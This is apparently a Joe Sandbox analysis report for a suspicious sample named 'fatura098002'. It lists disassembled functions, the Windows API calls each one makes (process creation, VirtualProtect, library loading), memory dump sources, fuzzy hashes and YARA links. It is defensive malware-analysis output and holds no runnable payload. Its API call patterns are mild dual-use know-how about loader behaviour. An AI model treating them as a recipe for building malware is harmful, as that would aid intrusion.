Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 3a824502af63fd3df6b675fe496431f5dc91cb1df97126efbb7a61aab357b6ed
Instruction ID: 96ffdfa2b878e6e573aa0089c4756aa6fd2a9f1126799ef28ea6a493e4fae8d8
Opcode Fuzzy Hash: 3a824502af63fd3df6b675fe496431f5dc91cb1df97126efbb7a61aab357b6ed
Instruction Fuzzy Hash: 89F0AF24A0021DE7CB04B6A8F85ADAE7B6C6E00310B604535F824965D3EF7DDB6586E1

Function 00FD02C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00FD030D
ExitProcess.KERNEL32(00000000), ref: 00FD032C

Strings

D, xrefs: 00FD02D9

Memory Dump Source

Source File: 00000000.00000002.1422505269.0000000000FCF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FCF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fcf000_fatura098002.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
Instruction ID: f3c2e623e0f1df4e444d22ef0ebff5d1d408ea45c60d97ee44d9fe20c45c0df0
Opcode Fuzzy Hash: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
Instruction Fuzzy Hash: 4EF0EC7294024CABDB60EFE0CC49FEE7779BF08701F548509FA0A9A180DA7896089B61

Function 00787F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 007882F5
TerminateProcess.KERNEL32(00000000), ref: 007882FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 007884DD

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 46a6a21d7ebcfb3b2f228482bdd8081b3e9c88cba0a5202cb8c436b3ed108ef5
Instruction ID: bdc69b6dae5aa806591a8dfa588ccec56ceb63292f08dfa533311967a29c4013
Opcode Fuzzy Hash: 46a6a21d7ebcfb3b2f228482bdd8081b3e9c88cba0a5202cb8c436b3ed108ef5
Instruction Fuzzy Hash: 4A127B71A08341DFC754DF28C484B2ABBE1FF84314F44895DE8998B292DB39ED45CB92

Function 007386AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,007385CC,?,007C8CC8,0000000C), ref: 00738704
GetLastError.KERNEL32(?,007385CC,?,007C8CC8,0000000C), ref: 0073870E
__dosmaperr.LIBCMT ref: 00738739

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: daf8c77105727132c271b1d3b7340197778b69ffe1222fda44566757cee08b7f
Instruction ID: 114a618037103a476d1cfd97a50b7fc7250d9119a190d6cf901aebc7eb3256fd
Opcode Fuzzy Hash: daf8c77105727132c271b1d3b7340197778b69ffe1222fda44566757cee08b7f
Instruction Fuzzy Hash: 30018E33605720D7F6B06334684B77E27594B82778F39011AF8158B0D3DEBDCC818192

Function 00711310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 007117F6

Strings

CALL, xrefs: 007117C6

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 4387e9eb1fe5295aabb5f94e35eafc2f07399e9093dea283750de4695e648dd0
Instruction ID: 66e4db4943a641686998b4d3219611b4f5ff31879cce3da1649159a638d878bf
Opcode Fuzzy Hash: 4387e9eb1fe5295aabb5f94e35eafc2f07399e9093dea283750de4695e648dd0
Instruction Fuzzy Hash: E522BD70608341DFC714CF18C484AAABBF1BF85314F94895DF9968B3A2D779E895CB82

Function 00703837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00703908

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: caf12b09a3949e84ed59bc8075615dea24a5653ea9b371e8b6dbf000c6ac3841
Instruction ID: a4264fb4ff1feac87c74587a8210fe824317e5d8446aff51828fc6c5199744f1
Opcode Fuzzy Hash: caf12b09a3949e84ed59bc8075615dea24a5653ea9b371e8b6dbf000c6ac3841
Instruction Fuzzy Hash: D831BF70605301DFD721DF24D884797BBF8FB49308F004A6EF59A83290E779AA44CB52

Function 00705745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0070949C,?,00008000), ref: 00705773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0070949C,?,00008000), ref: 00744052

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c86afa735bd7586529bff6445ae5ee356b8b7459c8d72420af3552a2f51bb752
Instruction ID: a4f9abc7cb251127e4b5b86f059e78e0b305515904647277bbeb0966d1ba1559
Opcode Fuzzy Hash: c86afa735bd7586529bff6445ae5ee356b8b7459c8d72420af3552a2f51bb752
Instruction Fuzzy Hash: BD015231185225F6E7314A2ADC0EF977F98EF027B0F14C311BA9C5A1E0CBB85855DB94

Function 0078709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 21aa2cdeb794df110a44ed5f3c8ab8270ac2555f1a7c9b44e45da185b9a96bf4
Instruction ID: 6cb8f8d951ba391bd67088c230feb14ba3343464546163712e08ff20e373ce4e
Opcode Fuzzy Hash: 21aa2cdeb794df110a44ed5f3c8ab8270ac2555f1a7c9b44e45da185b9a96bf4
Instruction Fuzzy Hash: 3AD15C75E04209EFCB18EF98C8859ADBBB5FF48310F244159E916AB291DB34ED81CB91

Function 00FD0338 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

APIs

Part of subcall function 00FCFBA8: GetFileAttributesW.KERNELBASE(?), ref: 00FCFBB3

CreateDirectoryW.KERNELBASE(?,00000000), ref: 00FD04A6

Memory Dump Source

Source File: 00000000.00000002.1422505269.0000000000FCF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FCF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fcf000_fatura098002.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 81e3e40c2fe50326fbca053cad5b50cce75681ab5e6e0aa7d0968f71fe58f353
Instruction ID: e4a5dcd62f45b14f8bca509692c672a809e4c524edc20d89294685e1065066fc
Opcode Fuzzy Hash: 81e3e40c2fe50326fbca053cad5b50cce75681ab5e6e0aa7d0968f71fe58f353
Instruction Fuzzy Hash: 29616F31A1020896EF14DFA0D855BEF733AFF58700F04456DEA0DE7290EB799A49CBA5

Function 0071FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0071FD1F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: afcec2a5ce6bb7006ed8928729a84ed38ebb066c1480d7245a1d3107416923cd
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 83310674A00109DBC718DF5DE4909A9F7A1FF89300B2486A5E84ACF695D735EDC1DBD0

Function 00704ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00704E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00704EDD,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704E9C
Part of subcall function 00704E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00704EAE
Part of subcall function 00704E90: FreeLibrary.KERNEL32(00000000,?,?,00704EDD,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704EFD

Part of subcall function 00704E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00743CDE,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704E62
Part of subcall function 00704E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00704E74
Part of subcall function 00704E59: FreeLibrary.KERNEL32(00000000,?,?,00743CDE,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704E87

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 00ae29ae9c36a37cb865dbf13a7f51b5246bd677ffe73b9b64b058be5bcdcb34
Instruction ID: a2ead5aec99a97718dbdbe7ae85fde52c3638a7c1cf4917d3d38ca907024bc1a
Opcode Fuzzy Hash: 00ae29ae9c36a37cb865dbf13a7f51b5246bd677ffe73b9b64b058be5bcdcb34
Instruction Fuzzy Hash: 161127B1600206EACF10BB60DC0BFAD77E4AF40711F10852DF642A61C1EFB8AA059B50

Function 00738402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00738440

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 2596838ea0aa6db92968e95934fcc28e7d82d69b9d4ceb45836c8c2978691e89
Instruction ID: aad7e28aae462a080ef95f8e1f5c8d76d0beb6fd23ad48178d3fd82b870303ab
Opcode Fuzzy Hash: 2596838ea0aa6db92968e95934fcc28e7d82d69b9d4ceb45836c8c2978691e89
Instruction Fuzzy Hash: 4211487190420AAFDF05DF58E94499A7BF4EF48300F104059F808AB312DB31EA11CBA5

Function 00701CD0 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00702B12,007D1418,?,?,?,?,?,?,?,00701CAD,?), ref: 00701D11

Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: FullNamePath_wcslen
String ID:
API String ID: 4019309064-0
Opcode ID: 667d516aa910432f2fe9898c804a1f894e364a93d91aa16b90138c803cb0317d
Instruction ID: fd79eae4493bf1368bcf341d6dac9bc8aebb927d9951b40a1e132a7216c72c6f
Opcode Fuzzy Hash: 667d516aa910432f2fe9898c804a1f894e364a93d91aa16b90138c803cb0317d
Instruction Fuzzy Hash: 3B1188B1B00209EBCB51EBA4D909ED973F8AF08354B5042A2B995E72D5DE7CDB848711

Function 0072E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: ff5ed68acff3ecbab3d32f4431f3af6e912c538b78e496c1241130bf45f91824
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 2AF0F432510A34EBE6313A69AC09B5A33A89F52331F100729F560921D3DB7CA80286A6

Function 00709CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00709CBD

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: b69da61d860569f929b1c99c18b9dc9fd277deabbe59855a51152ec416ee2fb7
Instruction ID: a04f1846c6a0d61ad10e7306230697bae70a45c03d891f45016b44fae1c5595b
Opcode Fuzzy Hash: b69da61d860569f929b1c99c18b9dc9fd277deabbe59855a51152ec416ee2fb7
Instruction Fuzzy Hash: 50F028B3600600FED7109F38D806AA7BB94EB44760F10862EF619CB1D2DB35E45087E0

Function 0071DB43 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(00000000,?,00000000,00000000,00000000,?,0070674A,?,00000047,00000000,00000000,?), ref: 0071DB77

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 037d0e987dd9f8ac34a77080d80c6f7798d5cef7727495ee3bdeb819dbd834f7
Instruction ID: f9b450b90d4cefae2225585b15a9fd775f25d95213ead811285675b83b10a6ce
Opcode Fuzzy Hash: 037d0e987dd9f8ac34a77080d80c6f7798d5cef7727495ee3bdeb819dbd834f7
Instruction Fuzzy Hash: A6F0BEB5204620EBCB256F19D549A69FBE5EF44B20F01812AF00A866C1CB79D861CBD8

Function 00733820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,007D1444), ref: 00733852

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 69dfc540eeb7ec40c48798bc79d0d85d3a6d3c032fdd34ecea490107c900058b
Instruction ID: 7521abc1d9ed14c51fa501d822f4f1fea89f9fee13eaa1cb9b8f63b72a2c2aaf
Opcode Fuzzy Hash: 69dfc540eeb7ec40c48798bc79d0d85d3a6d3c032fdd34ecea490107c900058b
Instruction Fuzzy Hash: 3BE0E532101234AAFA312A66AC05BDA3758AF427B0F050022FC04A25A2CB1DDD0281F8

Function 00704F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,007D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00704F6D

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
